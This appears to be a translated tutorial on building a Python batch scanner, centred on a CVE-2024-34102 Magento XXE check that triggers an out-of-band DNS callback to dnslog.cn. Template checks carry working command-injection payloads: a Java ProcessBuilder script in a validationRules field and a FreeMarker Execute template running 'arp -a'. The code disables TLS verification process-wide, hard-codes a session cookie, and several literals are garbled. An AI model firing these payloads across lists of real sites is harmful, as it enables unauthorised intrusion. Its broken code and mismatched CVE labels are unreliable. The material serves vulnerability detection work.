
Title: Quickly write a python vulnerability batch detection tool


1. Preface

The complete detection script is shown below:

import requests

import urllib3

import re,string,random

from urllib.parse import urljoin

import argparse

import time

import ssl

# NOTE(review): this swaps the ssl module's default HTTPS context factory for
# the unverified one, so standard-library HTTPS clients in this process stop
# validating server certificates. The effect is process-wide.
ssl._create_default_https_context=ssl._create_unverified_context

# Suppress urllib3's InsecureRequestWarning, which the verify=False requests
# made later in the script would otherwise trigger.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def banner():
    """Print the tool's ASCII-art logo, with an empty line before and after."""
    # Raw string: the backslashes in the art are printed as they are written.
    logo = r''''

____________ _____ _____ ____ _____ _____ _____ ____

/___\ \//____| |___ \/_ \___ \| || |___ \/_ \___//_

| | \ \//| _| _____ __) | | | | | | | |_____ ___) | | | | | | | |//'_ \

| |___ \ V/| |________/__/| |_|/__/|________/__/| |_| |//| (_) |

\____| \_/|______| |______|\___/_____| |______|\____//\___/

_____

|___ |

//

//

/_/

'''
    for chunk in ('', logo, ''):
        print(chunk)

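def read_file(file_path):
    """Load target URLs from a text file, one URL per line.

    Args:
        file_path: Path of the text file to read.

    Returns:
        list[str]: The non-blank lines of the file, in file order, with
        surrounding whitespace removed.

    Raises:
        OSError: If the file cannot be opened or read.
        UnicodeDecodeError: If the file is not valid UTF-8.
    """
    # Explicit encoding: the platform default differs between systems.
    with open(file_path, 'r', encoding='utf-8') as file:
        # Blank lines are dropped so they are never handed on as URLs.
        return [line.strip() for line in file if line.strip()]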

def check(url):
    """Probe one base URL for CVE-2024-34102 using an out-of-band DNS callback.

    Posts a JSON body that references a hostname issued by dnslog.cn to the
    guest-cart estimate-shipping-methods REST endpoint, then polls dnslog.cn
    up to three times for a record containing that hostname.

    Args:
        url: Base URL of the site to test; a trailing slash is stripped.

    Returns:
        True when the hostname appears in the dnslog.cn records; otherwise
        None, including when any exception was raised.
    """
    url=url.rstrip('/')
    taeget_url=urljoin(url, '/rest/V1/guest-carts/1/estimate-shipping-methods')
    try:
        headers={
            'User-Agent': 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36',
            'Content-Type': 'application/json'
        }
        # NOTE(review): the callback hostname comes from a public third-party
        # service over plain HTTP, using a session cookie hard-coded in the
        # script. Presumably every run with this cookie shares one record log,
        # so a hit may not belong to this probe, and the service operator can
        # see which hosts called back - confirm; a callback listener under the
        # tester's own control avoids both problems.
        getdomain=requests.get(url='http://dnslog.cn/getdomain.php', headers={'Cookie': 'PHPSESSID=hb0p9iqh804esb5khaulm8ptp2'}, timeout=30)
        domain=str(getdomain.text)
        # NOTE(review): the quote characters of this literal were lost when the
        # page was rendered; as printed the line is not valid Python.
        data=''{'address':{'totalsCollector':{'collectorList':{'totalCollector':{'sourceData':{'data':{'data':'http://%s','dataIsURL':true,'options':12345678}}}}}}}'''%(domain)
        # verify=False: the target's TLS certificate is not validated.
        requests.post(taeget_url, verify=False, headers=headers, data=data, timeout=25)
        for i in range(0, 3):
            refresh=requests.get(url='http://dnslog.cn/getrecords.php', headers={'Cookie': 'PHPSESSID=hb0p9iqh804esb5khaulm8ptp2'}, timeout=30)
            # The pause comes after the fetch, so the first poll happens
            # immediately after the POST.
            time.sleep(1)
            # A match shows that a lookup for the hostname was recorded.
            # NOTE(review): anything that resolves hostnames seen in traffic
            # could presumably cause the same record, so treat a hit as a lead
            # to confirm rather than proof.
            if domain in refresh.text:
                print(f'\033[31mDiscovered:{url}:AdobeMagento_CVE-2024-34102_XXE!\033[0m')
                return True
    # Every exception is discarded, so a timeout or connection failure looks
    # the same as a negative result.
    except Exception as e:
        pass

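if __name__=='__main__':
    # Script entry point: show the banner, parse the command line, then test
    # either one URL (-u) or every URL listed in a file (-f).
    banner()
    # The description now names the check that check() performs; the previous
    # text referred to a different product and CVE.
    parser=argparse.ArgumentParser(description='AdobeMagento_CVE-2024-34102_XXE detection script')
    parser.add_argument('-u', '--url', type=str, help='single URL detection')
    parser.add_argument('-f', '--txt', type=str, help='Batch URL file load detection')
    args=parser.parse_args()
    if args.url:
        # -u carries a URL, so it goes to check(), not to the file reader.
        check(args.url)
    elif args.txt:
        # -f carries a file path: load the list, then test each entry in turn.
        for target in read_file(args.txt):
            check(target)
    else:
        parser.print_help()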

The main functional points of the above batch detection code:

1. Banner function module, used to display graphical logos to beautify the display script

2. read_file function module, used to batch read url addresses in files

3. check function module, used to detect the vulnerability. It is best to build the request in BP (Burp Suite) first and write the matching rule from the values returned in the response.

4. The main function module mainly calls the above three functions and references the command line parser

2. Import python package

PyCharm Community's error highlighting can be used to find the packages that still need to be imported.

import requests

import urllib3

import re,string,random

from urllib.parse import urljoin

import argparse

import time

import ssl

# NOTE(review): this swaps the ssl module's default HTTPS context factory for
# the unverified one, so standard-library HTTPS clients in this process stop
# validating server certificates. The effect is process-wide.
ssl._create_default_https_context=ssl._create_unverified_context

# Suppress urllib3's InsecureRequestWarning, which requests made with
# verify=False would otherwise trigger.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

image-20240801024603100

3. Function modules

1. banner function

def banner():
    """Print the ASCII-art logo, framed by one empty line above and below."""
    # Raw string: the backslashes in the art are printed as they are written.
    art = r''''

____________ _____ _____ _____ _____ _ _____

/___\ \//____| |___ \/_ \___ \| || |___ /| || || |/|/_ \

| | \ \//| _| _____ __) | | | | | |__) | | | |____ |_ \| || |_| | | | | | | | | |

| |___ \ V/| |________/__/| |_|/__/|___ _|_______|___) |__ _| | |_| |

\____| \_/|______| |______|\___/_____| |_____/|_| |____/|_| |_|\____/

____

|___ \

__) |

/__/

|______|

'''
    for piece in ('', art, ''):
        print(piece)

Function: This function prints a graphical banner

Online generation tool: http://www.network-science.de/ascii/

Or use pyfiglet for local generation, and the generated code can be replaced in python code.

pip install pyfiglet

C:\Users\test> pyfiglet CVE-2024-34102

____________ _____ _____ _____ _____ _ _____

/___\ \//____| |___ \/_ \___ \| || |___ /| || || |/|/_ \

| | \ \//| _| _____ __) | | | | | |__) | | | |____ |_ \| || |_| | | | | | | | | |

| |___ \ V/| |________/__/| |_|/__/|___ _|_______|___) |__ _| | |_| |

\____| \_/|______| |______|\___/_____| |_____/|_| |____/|_| |_|\____/

____

|___ \

__) |

/__/

|______|

2.read_file function module

Function: This function reads each line in the specified file and returns a list containing the contents of these lines (assuming it is a URL).

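# Note: this helper is generic and can be reused unchanged.
def read_file(file_path):
    """Read a text file and return its lines as a list of URLs.

    Args:
        file_path: Path of the file to read.

    Returns:
        list[str]: The non-blank lines of the file, in file order, with
        surrounding whitespace removed.

    Raises:
        OSError: If the file cannot be opened or read.
        UnicodeDecodeError: If the file is not valid UTF-8.
    """
    # The with statement closes the file when the block ends. The encoding is
    # given explicitly because the platform default differs between systems.
    with open(file_path, 'r', encoding='utf-8') as file:
        # Iterate line by line; strip() removes the newline, and blank lines
        # are skipped so they are never returned as URLs.
        urls = [line.strip() for line in file if line.strip()]
    return urls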

3.check function module

# Note: adapt this function to the vulnerability being checked.
def check(url):
    # check() takes one parameter, url: the base URL to test.

    # Drop a trailing slash from the URL, if there is one.
    url=url.rstrip('/')
    # Join the base URL and the REST path to form the target URL.
    taeget_url=urljoin(url, '/rest/V1/guest-carts/1/estimate-shipping-methods')
    # Run the probe inside try; any exception jumps to the except block below.
    try:
        # Request headers: User-Agent, plus Content-Type giving the format of
        # the POST body.
        headers={
            'User-Agent': 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36',
            'Content-Type': 'application/json'
        }
        # Ask dnslog.cn for a hostname to watch for during this check.
        # NOTE(review): this is a public third-party service reached over plain
        # HTTP with a session cookie hard-coded in the script. Presumably every
        # run with this cookie shares one record log, so a hit may not belong
        # to this probe, and the service operator can see which hosts called
        # back - confirm; a callback listener under the tester's own control
        # avoids both problems.
        getdomain=requests.get(url='http://dnslog.cn/getdomain.php', headers={'Cookie': 'PHPSESSID=hb0p9iqh804esb5khaulm8ptp2'}, timeout=30)
        # Keep the response text as the hostname string.
        domain=str(getdomain.text)
        # Build the JSON request body with the hostname substituted in.
        # NOTE(review): the quote characters of this literal were lost when the
        # page was rendered; as printed the line is not valid Python.
        data=''{'address':{'totalsCollector':{'collectorList':{'totalCollector':{'sourceData':{'data':{'data':'http://%s','dataIsURL':true,'options':12345678}}}}}}}'''%(domain)
        # POST the body to the target URL. verify=False means the target's TLS
        # certificate is not validated.
        requests.post(taeget_url, verify=False, headers=headers, data=data, timeout=25)
        # Poll up to 3 times for a DNS record containing the hostname.
        for i in range(0, 3):
            # Fetch the DNS records collected by dnslog.cn.
            refresh=requests.get(url='http://dnslog.cn/getrecords.php', headers={'Cookie': 'PHPSESSID=hb0p9iqh804esb5khaulm8ptp2'}, timeout=30)
            # The pause comes after the fetch, so the first poll is immediate.
            time.sleep(1)
            # A record containing the hostname means a lookup for it was
            # observed; the script reports that as a finding.
            # NOTE(review): anything that resolves hostnames seen in traffic
            # could presumably cause the same record, so treat a hit as a lead
            # to confirm rather than proof.
            if domain in refresh.text:
                # Print the finding in red.
                print(f'\033[31mDiscovered:{url}:AdobeMagento_CVE-2024-34102_XXE!\033[0m')
                # True tells the caller that a hit was recorded.
                return True
    # Any exception raised above is caught and ignored, so a timeout or
    # connection failure looks the same as a negative result (None).
    except Exception as e:
        pass

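# Main forms of the detection function.
# GET type:
def check(url):
    """Fetch one path with GET and report whether the response matches the rule.

    This is a fill-in template: the '/url path' suffix and the two strings
    matched in the body are placeholders to replace for each check.

    Args:
        url: Base URL; a trailing slash is stripped before the path is added.

    Returns:
        bool: True when the status is 200 and the body contains both marker
        strings, otherwise False (including when the request fails).
    """
    # Imported here because the script's import block only brings in
    # urllib.parse.urljoin, which leaves the name `urllib` unbound; the
    # resulting NameError used to be swallowed by the except clause.
    import sys
    import urllib.request

    url = url.rstrip('/')
    target = url + '/url path'
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36'
    }
    try:
        # Request's `unverifiable` argument concerns cookie policy, not TLS
        # certificate checks, so it is not passed.
        request = urllib.request.Request(target, headers=headers, method='GET')
        # Bounded wait so one unresponsive host cannot stall a batch run; the
        # with block closes the connection.
        with urllib.request.urlopen(request, timeout=15) as res:
            status_code = res.getcode()
            # errors='replace' keeps a non-UTF-8 body from aborting the check.
            content = res.read().decode(errors='replace')
    except Exception as exc:
        # A failed request is reported instead of silently dropped, so it can
        # be told apart from a clean negative; the batch still continues.
        print(f'request failed for {url}: {exc}', file=sys.stderr)
        return False
    # The matching rule that decides whether the response counts as a finding.
    if status_code == 200 and 'fonts' in content and 'extensions' in content:
        print(f'\033[31mDiscovered:{url}: Vulnerability status description, such as (xxx has an RCE vulnerability)\033[0m')
        return True
    return False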

# POST type:
def check1(url):
    """Template for a POST-based check.

    Posts a fixed JSON body to a placeholder path and reports a finding when
    the response has status 200 and its text contains the marker string
    'HelloWorldTest' as well as 'message' and 'data'.

    Args:
        url: Base URL; a trailing slash is stripped before the path is joined.

    Returns:
        True on a match; otherwise None, including when an exception was
        raised.
    """
    url=url.rstrip('/')
    # '/url path' is a placeholder for the endpoint being checked.
    target=urljoin(url, '/url path')
    headers={
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36',
        # NOTE(review): the value starts with a space - likely unintended.
        'Content-Type':' application/json;charset=UTF-8' # format of the POST body
    }
    # Body of the POST request.
    # NOTE(review): the quote characters of this literal were lost when the
    # page was rendered; as printed the line is not valid Python.
    data='{'ParamName':'','paramDesc':'','paramType':'','sampleItem':'1','mandatory':true,'requiredFlag':1,'validationRules':'function verification(data){a=new java.lang.ProcessBuilder(\\\'echo\\\',\\\'HelloWorldTest\\\').start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line=r.readLine()) !=null){ss+=line};return ss;}'}'
    try:
        # Send the POST. verify=False means the target's TLS certificate is
        # not validated.
        response=requests.post(target, verify=False, headers=headers, data=data, timeout=15)
        if response.status_code==200 and 'HelloWorldTest' in response.text and 'message' in response.text and 'data' in response.text: # the matching rule that decides a finding
            print(f'\033[31mDiscovered:{url}: Vulnerability status description, such as (xxx has an rce vulnerability!\033[0m')
            return True
    # Every exception is discarded, so a failed request looks the same as a
    # negative result.
    except Exception as e:
        pass

def check2(url):
    """POST a form-encoded body to a fixed path and match on the response text.

    Reports a finding when the response has status 200 and its text contains
    both ' Internet' and '/clob'.

    Args:
        url: Base URL; a trailing slash is stripped before the path is joined.

    Returns:
        True on a match; otherwise None, including when an exception was
        raised.
    """
    url=url.rstrip('/')
    target=urljoin(url, '/jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action')
    headers={
        # NOTE(review): this User-Agent string has no closing parenthesis.
        'User-Agent': 'Mozilla/2.0 (compatible; MSIE 3.01; Windows 95',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    # NOTE(review): this literal opens with three quotes and closes with two,
    # so as printed on this page the line is not valid Python.
    data='''modulId=1code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%2528%2529%2528%2522arp%2520-a%2522%2529%257D%253C%252Fclob%253Euuid=1''
    try:
        # verify=False: the target's TLS certificate is not validated.
        response=requests.post(target, verify=False, headers=headers, data=data, timeout=15)
        # The matching rule that decides a finding.
        # NOTE(review): ' Internet' looks like a fragment of localized command
        # output; if so, the rule can miss on hosts using another language -
        # confirm.
        if response.status_code==200 and ' Internet' in response.text and '/clob' in response.text:
            print(f'\033[31mDiscovered:{url}: Vulnerability status description, such as (xxx has an rce vulnerability!\033[0m')
            return True
    # Every exception is discarded, so a failed request looks the same as a
    # negative result.
    except Exception as e:
        pass

4. Main function module

Function: Call the function above

This part is the entry of the script, parsing command line parameters, and if the --url parameter is provided, a single URL is detected; if the --txt parameter is provided, multiple URL addresses in the file are detected.

if __name__=='__main__':

#Call the banner function and display the above identification diagram

banner()

#Command line parameter parser

parser=argparse.ArgumentParser(description='AdobeColdFusion_CVE-2024-20767_ArbitraryFileRead detection script')

parser.add_argument('-u', '--url',type=str, help='single URL detection')

parser.add_argument('-f', '--txt',type=str, help='Batch URL file load detection')
